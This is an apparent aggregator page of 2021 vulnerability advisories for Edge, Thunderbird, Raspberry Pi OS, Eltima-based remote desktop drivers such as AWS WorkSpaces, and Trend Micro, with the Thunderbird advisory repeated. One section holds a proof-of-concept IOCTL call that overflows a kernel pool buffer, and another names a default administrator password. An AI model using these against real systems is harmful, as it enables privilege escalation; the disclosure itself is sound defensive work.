**What is the version information for this release?**

Microsoft Edge Version

Date Released

Based on Chromium Version

96.0.1054.53

12/9/2021

96.0.4664.93

CVE-2021-4063: Chromium: CVE-2021-4063 Use after free in developer tools

CVE-2021-4061: Chromium: CVE-2021-4061 Type Confusion in V8

CVE-2021-4062: Chromium: CVE-2021-4062 Heap buffer overflow in BFCache

CVE-2021-4058: Chromium: CVE-2021-4058 Heap buffer overflow in ANGLE

CVE-2021-4052: Chromium: CVE-2021-4052 Use after free in web apps

By displaying a form validity message in the correct location at the same time as a permission prompt (such as for geolocation), the validity message could have obscured the prompt, resulting in the user potentially being tricked into granting the permission. This vulnerability affects Firefox < 94, Thunderbird < 91.3, and Firefox ESR < 91.3.

**Mozilla Foundation Security Advisory 2021-50**

Announced

November 3, 2021

Impact

high

Products

Thunderbird

Fixed in

*   Thunderbird 91.3

_In general, these flaws cannot be exploited through email in the Thunderbird product because scripting is disabled when reading mail, but are potentially risks in browser or browser-like contexts._

**#CVE-2021-38503: iframe sandbox rules did not apply to XSLT stylesheets**

Reporter

Armin Ebert

Impact

high

**Description**

The iframe sandbox rules were not correctly applied to XSLT stylesheets, allowing an iframe to bypass restrictions such as executing scripts or navigating the top-level frame.

**References**

*   Bug 1729517

**#CVE-2021-38504: Use-after-free in file picker dialog**

Reporter

Irvan Kurniawan

Impact

high

**Description**

When interacting with an HTML input element's file picker dialog with webkitdirectory set, a use-after-free could have resulted, leading to memory corruption and a potentially exploitable crash.

**References**

*   Bug 1730156

**#CVE-2021-38505: Windows 10 Cloud Clipboard may have recorded sensitive user data**

Reporter

Sergey Galich

Impact

high

**Description**

Microsoft introduced a new feature in Windows 10 known as Cloud Clipboard which, if enabled, will record data copied to the clipboard to the cloud, and make it available on other computers in certain scenarios. Applications that wish to prevent copied data from being recorded in Cloud History must use specific clipboard formats; and Thunderbird before version 91.3 did not implement them. This could have caused sensitive data to be recorded to a user's Microsoft account.  
_This bug only affects Thunderbird for Windows 10+ with Cloud Clipboard enabled. Other operating systems are unaffected._

**References**

*   Bug 1730194

**#CVE-2021-38506: Thunderbird could be coaxed into going into fullscreen mode without notification or warning**

Reporter

Irvan Kurniawan

Impact

high

**Description**

Through a series of web navigations, Thunderbird could have entered fullscreen mode without notification or warning to the user. This could lead to spoofing attacks on the browser UI including phishing.

**References**

*   Bug 1730750

**#CVE-2021-38507: Opportunistic Encryption in HTTP2 could be used to bypass the Same-Origin-Policy on services hosted on other ports**

Reporter

Takeshi Terada

Impact

high

**Description**

The Opportunistic Encryption feature of HTTP2 (RFC 8164) allows a connection to be transparently upgraded to TLS while retaining the visual properties of an HTTP connection, including being same-origin with unencrypted connections on port 80. However, if a second encrypted port on the same IP address (e.g. port 8443) did not opt-in to opportunistic encryption; a network attacker could forward a connection from the browser to port 443 to port 8443, causing the browser to treat the content of port 8443 as same-origin with HTTP. This was resolved by disabling the Opportunistic Encryption feature, which had low usage.

**References**

*   Bug 1730935

**#CVE-2021-43535: Use-after-free in HTTP2 Session object**

Reporter

Julien Cristau

Impact

high

**Description**

A use-after-free could have occured when an HTTP2 session object was released on a different thread, leading to memory corruption and a potentially exploitable crash.

**References**

*   Bug 1667102

**#CVE-2021-38508: Permission Prompt could be overlaid, resulting in user confusion and potential spoofing**

Reporter

Raphael

Impact

moderate

**Description**

By displaying a form validity message in the correct location at the same time as a permission prompt (such as for geolocation), the validity message could have obscured the prompt, resulting in the user potentially being tricked into granting the permission.

**References**

*   Bug 1366818

**#CVE-2021-38509: Javascript alert box could have been spoofed onto an arbitrary domain**

Reporter

Ademar Nowasky Junior

Impact

moderate

**Description**

Due to an unusual sequence of attacker-controlled events, a Javascript alert() dialog with arbitrary (although unstyled) contents could be displayed over top an uncontrolled webpage of the attacker's choosing.

**References**

*   Bug 1718571

**#CVE-2021-38510: Download Protections were bypassed by .inetloc files on Mac OS**

Reporter

Hou JingYi

Impact

moderate

**Description**

The executable file warning was not presented when downloading .inetloc files, which, due to a flaw in Mac OS, can run commands on a user's computer.  
_Note: This issue only affected Mac OS operating systems. Other operating systems are unaffected._

**References**

*   Bug 1731779

**#CVE-2021-43534: Memory safety bugs fixed in Thunderbird ESR 91.3**

Reporter

Mozilla developers

Impact

high

**Description**

Mozilla developers and community members Christian Holler, Valentin Gosu, and Andrew McCreight reported memory safety bugs present in Thunderbird 91.2. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Thunderbird 91.3

CVE-2021-38508: Security Vulnerabilities fixed in Thunderbird 91.3

A use-after-free could have occured when an HTTP2 session object was released on a different thread, leading to memory corruption and a potentially exploitable crash. This vulnerability affects Firefox < 93, Thunderbird < 91.3, and Firefox ESR < 91.3.

**Mozilla Foundation Security Advisory 2021-50**

Announced

November 3, 2021

Impact

high

Products

Thunderbird

Fixed in

*   Thunderbird 91.3

_In general, these flaws cannot be exploited through email in the Thunderbird product because scripting is disabled when reading mail, but are potentially risks in browser or browser-like contexts._

**#CVE-2021-38503: iframe sandbox rules did not apply to XSLT stylesheets**

Reporter

Armin Ebert

Impact

high

**Description**

The iframe sandbox rules were not correctly applied to XSLT stylesheets, allowing an iframe to bypass restrictions such as executing scripts or navigating the top-level frame.

**References**

*   Bug 1729517

**#CVE-2021-38504: Use-after-free in file picker dialog**

Reporter

Irvan Kurniawan

Impact

high

**Description**

When interacting with an HTML input element's file picker dialog with `webkitdirectory` set, a use-after-free could have resulted, leading to memory corruption and a potentially exploitable crash.

**References**

*   Bug 1730156

**#CVE-2021-38505: Windows 10 Cloud Clipboard may have recorded sensitive user data**

Reporter

Sergey Galich

Impact

high

**Description**

Microsoft introduced a new feature in Windows 10 known as Cloud Clipboard which, if enabled, will record data copied to the clipboard to the cloud, and make it available on other computers in certain scenarios. Applications that wish to prevent copied data from being recorded in Cloud History must use specific clipboard formats; and Thunderbird before version 91.3 did not implement them. This could have caused sensitive data to be recorded to a user's Microsoft account.  
_This bug only affects Thunderbird for Windows 10+ with Cloud Clipboard enabled. Other operating systems are unaffected._

**References**

*   Bug 1730194

**#CVE-2021-38506: Thunderbird could be coaxed into going into fullscreen mode without notification or warning**

Reporter

Irvan Kurniawan

Impact

high

**Description**

Through a series of web navigations, Thunderbird could have entered fullscreen mode without notification or warning to the user. This could lead to spoofing attacks on the browser UI including phishing.

**References**

*   Bug 1730750

**#CVE-2021-38507: Opportunistic Encryption in HTTP2 could be used to bypass the Same-Origin-Policy on services hosted on other ports**

Reporter

Takeshi Terada

Impact

high

**Description**

The Opportunistic Encryption feature of HTTP2 (RFC 8164) allows a connection to be transparently upgraded to TLS while retaining the visual properties of an HTTP connection, including being same-origin with unencrypted connections on port 80. However, if a second encrypted port on the same IP address (e.g. port 8443) did not opt-in to opportunistic encryption; a network attacker could forward a connection from the browser to port 443 to port 8443, causing the browser to treat the content of port 8443 as same-origin with HTTP. This was resolved by disabling the Opportunistic Encryption feature, which had low usage.

**References**

*   Bug 1730935

**#CVE-2021-43535: Use-after-free in HTTP2 Session object**

Reporter

Julien Cristau

Impact

high

**Description**

A use-after-free could have occured when an HTTP2 session object was released on a different thread, leading to memory corruption and a potentially exploitable crash.

**References**

*   Bug 1667102

**#CVE-2021-38508: Permission Prompt could be overlaid, resulting in user confusion and potential spoofing**

Reporter

Raphael

Impact

moderate

**Description**

By displaying a form validity message in the correct location at the same time as a permission prompt (such as for geolocation), the validity message could have obscured the prompt, resulting in the user potentially being tricked into granting the permission.

**References**

*   Bug 1366818

**#CVE-2021-38509: Javascript alert box could have been spoofed onto an arbitrary domain**

Reporter

Ademar Nowasky Junior

Impact

moderate

**Description**

Due to an unusual sequence of attacker-controlled events, a Javascript `alert()` dialog with arbitrary (although unstyled) contents could be displayed over top an uncontrolled webpage of the attacker's choosing.

**References**

*   Bug 1718571

**#CVE-2021-38510: Download Protections were bypassed by .inetloc files on Mac OS**

Reporter

Hou JingYi

Impact

moderate

**Description**

The executable file warning was not presented when downloading .inetloc files, which, due to a flaw in Mac OS, can run commands on a user's computer.  
_Note: This issue only affected Mac OS operating systems. Other operating systems are unaffected._

**References**

*   Bug 1731779

**#CVE-2021-43534: Memory safety bugs fixed in Thunderbird ESR 91.3**

Reporter

Mozilla developers

Impact

high

**Description**

Mozilla developers and community members Christian Holler, Valentin Gosu, and Andrew McCreight reported memory safety bugs present in Thunderbird 91.2. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Thunderbird 91.3

CVE-2021-43535: Security Vulnerabilities fixed in Thunderbird 91.3

Raspberry Pi OS through 5.10 has the raspberry default password for the pi account. If not changed, attackers can gain administrator privileges.

CVE-2021-38759: Raspberry Pi Documentation - Configuration

Amazon Amazon WorkSpaces agent is affected by Integer Overflow. IOCTL Handler 0x22001B in the Amazon WorkSpaces agent below v1.0.1.1537 allow local attackers to execute arbitrary code in kernel mode or cause a denial of service (memory corruption and OS crash) via specially crafted I/O Request Packet.

**Executive Summary**

*   SentinelLabs has discovered a number of high severity flaws in driver software affecting numerous cloud services.
*   Cloud desktop solutions like Amazon Workspaces rely on third-party libraries, including Eltima SDK, to provide ‘USB over Ethernet’ capabilities that allow users to connect and share local devices like webcams. These cloud services are in use by millions of customers worldwide.
*   Vulnerabilities in Eltima SDK, derivative products, and proprietary variants are unwittingly inherited by cloud customers.
*   These vulnerabilities allow attackers to escalate privileges enabling them to disable security products, overwrite system components, corrupt the operating system, or perform malicious operations unimpeded.
*   SentinelLabs’ findings were proactively reported to the vulnerable vendors during Q2 2021 and the vulnerabilities are tracked as CVE-2021-42972, CVE-2021-42973, CVE-2021-42976, CVE-2021-42977, CVE-2021-42979, CVE-2021-42980, CVE-2021-42983, CVE-2021-42986, CVE-2021-42987, CVE-2021-42988, CVE-2021-42990, CVE-2021-42993, CVE-2021-42994, CVE-2021-42996, CVE-2021-43000, CVE-2021-43002, CVE-2021-43003, CVE-2021-43006, CVE-2021-43637, CVE-2021-43638, CVE-2021-42681, CVE-2021-42682, CVE-2021-42683, CVE-2021-42685, CVE-2021-42686, CVE-2021-42687, CVE-2021-42688.
*   Vendors have released security updates to address these vulnerabilities. Some of these are automatically applied while others require customer actions.
*   At this time, SentinelLabs has not discovered evidence of in-the-wild abuse.

**Introduction**

Throughout 2020-2021, organizations worldwide needed to adopt new work models, including work from home (WFH), in response to the COVID-19 pandemic. This required organizations to make use of various solutions that allow WFH employees to securely access their organization’s assets and resources. As a result, the market for WFH solutions has seen tremendous growth, but security has not necessarily evolved accordingly.

In this post, we disclose details of multiple vulnerabilities we discovered in major cloud services including:

*   Amazon Nimble Studio AMI, prior to: 2021/07/29
*   Amazon NICE DCV, below: 2021.1.7744 (Windows), 2021.1.3560 (Linux), 2021.1.3590 (Mac), 2021/07/30
*   Amazon WorkSpaces agent, below: v1.0.1.1537, 2021/07/31
*   Amazon AppStream client version below: 1.1.304, 2021/08/02
*   NoMachine \[all products for Windows\], above v4.0.346 below v.7.7.4 (v.6.x is being updated as well)
*   Accops HyWorks Client for Windows: version v3.2.8.180 or older
*   Accops HyWorks DVM Tools for Windows: version 3.3.1.102 or lower (Part of Accops HyWorks product earlier than v3.3 R3)
*   Eltima USB Network Gate below 9.2.2420 above 7.0.1370
*   Amzetta zPortal Windows zClient <= v3.2.8180.148
*   Amzetta zPortal DVM Tools <= v3.3.148.148
*   FlexiHub below 5.2.14094 (latest) above 3.3.11481
*   Donglify below 1.7.14110 (latest) above 1.0.12309

It is important to note that:

1.  These vulnerabilities originated from a library developed and provided by Eltima, which is in use by several cloud providers.
2.  Both the end user (AWS WorkSpaces client in this example) and cloud service (AWS WorkSpaces running in AWS Cloud) are vulnerable to various vulnerabilities we will discuss below. This peculiarity can be attributed to code-sharing between both the server side and client side applications.
3.  While we have confirmed these vulnerabilities for AWS, NoMachine and Accops, our testing was limited in scope to these vendors, and we believe _it is highly likely other cloud providers using the same libraries would be vulnerable_.
4.  Also, of the vendors tested, not all vendors were tested for both client side and server side vulnerabilities; consequently, there might also be further instances of the vulnerabilities there.

**Technical Details**

While these vulnerabilities affect multiple products, the technical details below will mainly focus on AWS WorkSpaces as an example. This is where our research began, and the flaws are essentially the same across all mentioned products.

Amazon WorkSpaces is a fully managed and persistent desktop virtualization service that enables users to access data, applications, and resources they need anywhere from any supported device. WorkSpaces supports provisioning Windows or Linux desktops and can be quickly scaled to provide thousands of desktops to workers across the globe.

WorkSpaces increases security by keeping data off the end user’s device and increasing reliability with the power of the AWS Cloud, an increasingly valuable service for the growing remote workforce.

![](https://899029.smushcdn.com/2131410/wp-content/uploads/2021/12/Workspace-Architecture.jpg?lossy=0&strip=1&webp=0)

WorkSpaces architecture; source: AWS

As shown above, authentication and session orchestration is done over HTTPS, while the data stream is either PCoIP (PC Over IP) or WSP (WorkSpaces Streaming Protocol), a proprietary protocol.

The main difference between them is that on Amazon WorkSpaces, only WSP supports device redirection such as smart cards and webcams. This is where the vulnerabilities reside.

The WSP protocol consists of several libraries, some of which are provided by 3rd parties. One of these is the Eltima SDK. Eltima develops a product called “USB Over Ethernet”, which enables remote USB redirection.

The same product, with some modifications, is used by Amazon WorkSpaces to enable its users to redirect USB devices to their remote desktop, allowing them to connect devices such as USB webcams to Zoom calls directly from the remote desktop.

The program is bundled with the “client” (connect to other shared devices) and the “server” (share a device over the internet):

![](https://899029.smushcdn.com/2131410/wp-content/uploads/2021/12/USB-Over-Ethernet.jpg?lossy=0&strip=1&webp=0)

USB Over Ethernet screenshot; source: Eltima

The drivers responsible for USB redirection are `wspvuhub.sys` and `wspusbfilter.sys`, both of which are vulnerable and seem to have been in use since the beginning of 2020, when WSP protocol was announced.

Before going through the vulnerabilities, it’s important to understand how the Windows Kernel IO Manager (IOMgr) works. When a user-mode thread sends an IRP\_MJ\_DEVICE\_CONTROL packet, it passes input and output data between the user-mode and kernel-mode, depending on the I/O Control (IOCTL) code invoked. As per Microsoft’s documentation, _“an I/O control code is a 32-bit value that consists of several fields”_, as illustrated in the following figure:

![](https://899029.smushcdn.com/2131410/wp-content/uploads/2021/12/IO-Control.jpg?lossy=0&strip=1&webp=0)

Input/output Control Code Structure; source: Microsoft

For the purposes of this post, we will focus on the two least significant bits, `TransferType`. The documentation tells us that these bits indicate how the system will pass data between the caller of `NtDeviceIoControlFile` syscall and the driver that handles the IRP.

There are three ways to exchange data between kernel mode and user mode using an IRP:

1.  METHOD\_BUFFERED – considered the most secure. Using this method IOMgr will copy the caller input data out of, and then into, the supplied caller output buffer.
2.  METHOD\_IN/OUT\_DIRECT – Depending on the data direction, the IOMgr will supply an MDL that describes a buffer, and ensures that the executing thread has read/write-access to the buffer. IOCTL routines can then lock the buffer to the memory.
3.  METHOD\_NEITHER – considered more prone to faults. The IOMgr doesn’t map/validate the supplied buffer; the IOCTL handler receives a user-mode address. This is mostly used for high speed data processing.

The vulnerable IOCTL handlers, which contain several vulnerabilities and are the same across all vulnerable products, are 0x22005B and 0x22001B.

![](https://899029.smushcdn.com/2131410/wp-content/uploads/2021/12/Type3InputBuffer.jpg?lossy=0&strip=1&webp=0)

This code deals with a user buffer of type METHOD\_NEITHER (Type3InputBuffer)

This means that the IOCTL handler is responsible for validating, probing, locking, and mapping the buffer itself depending on the use case.

This opens up many possibilities to exploit the device, such as double fetches, and arbitrary pointer dereference, which can lead to other vulnerabilities as well. In the image below, it can be seen that buffer verification does not exist at all in this code:

![](https://899029.smushcdn.com/2131410/wp-content/uploads/2021/12/IOCTL-Handler.jpg?lossy=0&strip=1&webp=0)

IOCTL 0x22001B Handler

Here’s a brief explanation of this code:

1.  First, the routine checks whether the calling process is 32bit or 64bit (red arrow).
2.  It then decides whether to use `alloc_size_64bit` or `alloc_size_32bit` based on the first check’s results (blue arrow) .
3.  Next, there is a call to `ExAllocatePoolWithTag_wrapper` with user controlled size parameter (pink arrow).
4.  At this point, the code proceeds to blocks that handle 32 bit `memmove` (yellow arrow) and 64 bit `memmove` (green arrow). As can be seen in the image, at this stage there are cases of insecure arithmetic operations on user controlled data without any overflow checks when calculating the copy size, which can lead to integer overflows that might eventually lead to arbitrary code execution.

Generally speaking, accessing (reading/writing) user-mode addresses requires probing. Dealing with `Type3InputBuffer` also requires you to lock the pages to the memory and only fetch data once.

The easiest way to cause an overflow in this code is by passing different parameters for the allocation and copy functions. This can be done by crafting a special IRP:

struct struct\_usercontrolled {
        int gap1;
        int firstObject\_handle;
        int secondObject\_handle;
        int thirdObject\_handle;
        int alloc\_size\_32bit;
        unsigned int gap2;
        unsigned int copy\_size\_32bit;
        unsigned int alloc\_size\_64bit;
        unsigned int gap3;
        unsigned int copy\_size\_64bit;
}

Where either `copy_size_64bit` or `copy_size_32bit` are greater than `alloc_size_32bit` or alloc\_size\_64bit.

Even if the copy size and allocation size were the exact same parameter, the code is still exploitable due to the fact that there are insecure arithmetic operations when calculating the `memmove` size parameter.

In a simplified version, to trigger this vulnerability, an attacker may send the following IOCTL (assuming running a 64bit process):

uc.alloc\_size\_64bit = 0x20;
uc.copy\_size\_64bit = 0x100;
 
memset(&ol, 0, sizeof(ol)); // \_OVERLAPPED
HANDLE EventW = CreateEventW(NULL, TRUE, FALSE, NULL);
ol.hEvent = EventW;
 
if (!DeviceIoControl(file\_device\_handle, 0x22001B, &uc, size, &OutBuffer, 8u, &NumberOfBytesTransferred, &ol) && (GetLastError() != ERROR\_IO\_PENDING || !GetOverlappedResult(file\_device\_handle, &ol, &NumberOfBytesTransferred, 1))) {
    exit(printf("IOCTL 0x22001B\\r\\n"));
}

This code will result in allocation of 0x20 bytes:

3: kd> r
rax=0000000000000000 rbx=ffff92889d98ad40 rcx=0000000000000001
rdx=00000000000000**20** rsi=ffff92889d98a000 rdi=000000603e8ff5c8
rip=fffff80627175366 rsp=ffffde0f29eed6e0 rbp=0000000000000000
 r8=0000000000004c50  r9=fffff806271761e0 r10=fffff80627170ca0
r11=0000000000000000 r12=ffff92889962bc40 r13=0000000000000000
r14=0000000000000020 r15=ffff92889949eb38
iopl=0         nv up ei pl zr na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00040246
wspvuhub+0x15366:
fffff806\`27175366 e899c6ffff      call    wspvuhub+0x11a04 (fffff806\`27171a04)

and copying of 0x435 bytes:

3: kd> r
rax=ffffad0e69959eb0 rbx=ffff92889d98ad40 rcx=ffffad0e69959eb0
rdx=000000603e8ff5c8 rsi=ffffad0e69959eb0 rdi=000000603e8ff5c8
rip=fffff80627175420 rsp=ffffde0f29eed6e0 rbp=0000000000000000
 r8=0000000000000**435**  r9=00000000000001b0 r10=0000000000004c50
r11=0000000000001001 r12=ffff92889962bc40 r13=0000000000000000
r14=0000000000000020 r15=ffff92889949eb38
iopl=0         nv up ei pl zr na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00040246
wspvuhub+0x15420:
fffff806\`27175420 e85b090000      call    wspvuhub+0x15d80 (fffff806\`27175d80)

Since we control both the data and the size this makes a very strong primitive to achieve code execution in kernel mode.

![](https://899029.smushcdn.com/2131410/wp-content/uploads/2021/12/BSOD-PoC.jpg?lossy=0&strip=1&webp=0)

BSoD Proof Of Concept

Using the DeviceTree tool from OSR, we can see that this driver accepts IOCTLs without ACL enforcements (note: Some drivers handle access to devices independently in IRP\_MJ\_CREATE routines):

![](https://899029.smushcdn.com/2131410/wp-content/uploads/2021/12/DeviceTree.jpg?lossy=0&strip=1&webp=0)

Using DeviceTree software to examine the security descriptor of the device

This means the vulnerability can be triggered from sandboxes and might be exploitable in contexts other than just local privilege escalation. For example, it might be used as a second stage browser attack (although most modern browsers have a list of allowed IOCTLs requests) or other sandboxes for that matter.

**Impact**

*   **Who is affected?** Users with the mentioned client versions are prone to vulnerabilities that if exploited successfully may be used to gain high privileges. Since the vulnerable code exists in both the remote and local side, remote desktops are also affected by this vulnerability.

*   **What is the risk?** These high severity flaws could allow any user on the computer, even without privileges, to escalate privileges and run code in kernel mode. Among the obvious abuses of such vulnerabilities are that they could be used to bypass security products. An attacker with access to an organization’s network may also gain access to execute code on unpatched systems and use this vulnerability to gain local elevation of privilege. Attackers can then leverage other techniques to pivot to the broader network, like lateral movement.

**Recommendations**

We responsibly disclosed our findings to product vendors. We are aware of the following vendor responses:

Accops has released an advisory page here.

NoMachine has released an advisory page here.

On AWS (Amazon Workspaces), a manual update needs to be performed if you either have:

1.  **AutoStop WorkSpaces** with maintenance turned off.
2.  **AlwaysOn WorkSpaces** with OS updates turned off.

In order to check your maintenance settings:

1.  Open the WorkSpaces console at https://console.aws.amazon.com/workspaces/.
2.  In the navigation pane, choose **Directories**.
3.  Select your directory, and choose **Actions, Update Details**.
4.  Expand **Maintenance Mode**.

Make sure to update the client application.

While we have no evidence of in-the-wild exploitation of these vulnerabilities, we further recommend revoking any privileged credentials deployed to the platform before the cloud platforms have been patched and checking access logs for irregularities.

**Conclusion**

Vulnerabilities in third-party code have the potential to put huge numbers of products, systems, and ultimately, end users at risk, as we’ve noted before. The outsized effect of vulnerable dependency code is magnified even further when it appears in services offered by cloud providers. We urge all organizations relying on the affected services to review the recommendations above and take appropriate action.

As part of the commitment of SentinelLabs to advancing public cloud security, we actively invest in public cloud research, including advanced threat modeling and vulnerability testing of cloud platforms and related technologies. For maximum protection, we strongly recommend using SentinelOne Singularity platform.

We would like to thank those vendors that responded to our disclosure and for remediating the vulnerabilities quickly.

**Disclosure Timeline**

**Amazon**

*   May 2, 2021 – Initial disclosure.
*   May 2, 2021 – First response from AWS security team.
*   May 7, 2021 – AWS security team report that they’re still actively investigating the issue.
*   May 13, 2021- AWS security team report that they’re still actively investigating the issue.
*   May 18, 2021 – AWS security team acknowledged the reported issues.
*   Jun 25, 2021 – AWS security team reported that they pushed out a fix to all regions.
*   Jul 1, 2021 – AWS security team asked for more technical details regarding the issues.
*   Jul 11, 2021 – SentinelOne answers the questions.

**Eltima**

*   Jun 6, 2021 – Initial disclosure.
*   Jun 14, 2021 – Eltima Support first responded that they’re reviewing the report.
*   Jun 15, 2021 – Eltima Support claimed that they are aware of the vulnerabilities, but it’s resolved because the feature is turned off.
*   Jun 15, 2021- We responded that the product is still vulnerable even if the feature is turned off.
*   Jun 15, 2021 – Eltima Support responded that they discontinued using those IOCTLs due to security reasons but for backward compatibility they still keep it.
*   Jun 19, 2021 – We clarified that the vulnerable code is still reachable and exploitable.
*   Jun 29, 2021 – Eltima Support responded that their team started the work on a new build without the mentioned vulnerabilities.
*   Jul 1, 2021 – Eltima Support requests more time.
*   Sep 6, 2021- Eltima notified us that they released fixed versions for their products.

**Accops**

*   Jun 28, 2021 – Initial disclosure.
*   Jun 28, 2021 – Accops first responded that they’re reviewing the report.
*   Sep 5, 2021 – Accops reported that the issue is fixed and updated modules are available from Accops website and support portal for download. Customers are notified to upgrade to new versions. Fixed modules are Accops HyWorks Client for Windows version 3.2.8.200 onwards and Accops HyWorks DVM Tools for Windows version 3.3.1.105 onwards (part of Accops HyWorks release 3.3 R3).
*   Dec 4, 2021 – Accops has released a utility to detect vulnerable endpoints. The utility is downloadable from Accops support site.

**Mechdyne**

*   We tried to contact Mechdyne several times during June 2021 to September 2021 but did not receive a response.

**Amzetta**

*   Jul 1, 2021 – Initial disclosure.
*   Jul 2, 2021 – Amzetta acknowledges the vulnerabilities and removed the product from their website.
*   Sep 3, 2021 – Amzetta notified us that they released fixed versions for their products.

**NoMachine**

*   Jun 28, 2021 – Initial disclosure.
*   Jul 5, 2021 – NoMachine acknowledges the vulnerabilities.
*   Oct 21, 2021 – NoMachine informed us that the patches are released.

CVE-2021-43638: USB Over Ethernet | Multiple Vulnerabilities in AWS and Other Major Cloud Services

Trend Micro Security 2021 v17.0 (Consumer) contains a vulnerability that allows files inside the protected folder to be modified without any detection.

**LAST UPDATED: NOV 30, 2021**

**Release Date:** Nov 29, 2021

**Trend Micro Vulnerability Identifier:** CVE-2021-43772

**Platform(s):** Windows OS

**CVSSv3 Score: 5.5:** AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

**Severity Rating:** Medium

**Summary**

Trend Micro has released a new version of Trend Micro Security. This update resolves the Folder Shield protected folder bypass affecting the Trend Micro Security 2021 family of consumer products.

**Affected version(s)**

PRODUCT

AFFECTED VERSION(S)

PLATFORM

LANGUAGE(S)

Premium Security

2021 (v17) and below

Microsoft Windows

English

Maximum Security

2021 (v17) and below

Microsoft Windows

English

Internet Security

2021 (v17) and below

Microsoft Windows

English

Antivirus+ Security

2021 (v17) and below

Microsoft Windows

English

**Solution**

Trend Micro has released a version to resolve this issue:

PRODUCT

AFFECTED VERSION(S)

PLATFORM

LANGUAGE(S)

All version above

2022 (v17.7)

Microsoft Windows

English

**Vulnerability Details**

This new version resolves a vulnerability in the product that allows files inside the protected folder to be modified without any detection.

Trend Micro has received no reports nor is aware of any actual attacks against the affected products related to this vulnerability at this time.

**Mitigating Factors**

None identified. Customers are advised to ensure they always have the latest version of the program.

**Acknowledgment**

Trend Micro would like to thank Amir Ahmadi (@KingAmir) for responsibly disclosing this issue and working with Trend Micro to help protect our customers.

**Additional Assistance**

Customers who have questions are encouraged to contact Trend Micro technical support for further assistance.

How helpful was this article?

*   It wasn't helpful at all.
*   Somewhat helpful.
*   Just okay.
*   It was somewhat helpful.
*   It was helpful.

*   \*Feedback submitted will only be used as reference for future product, service and article improvements.

Tag

#microsoft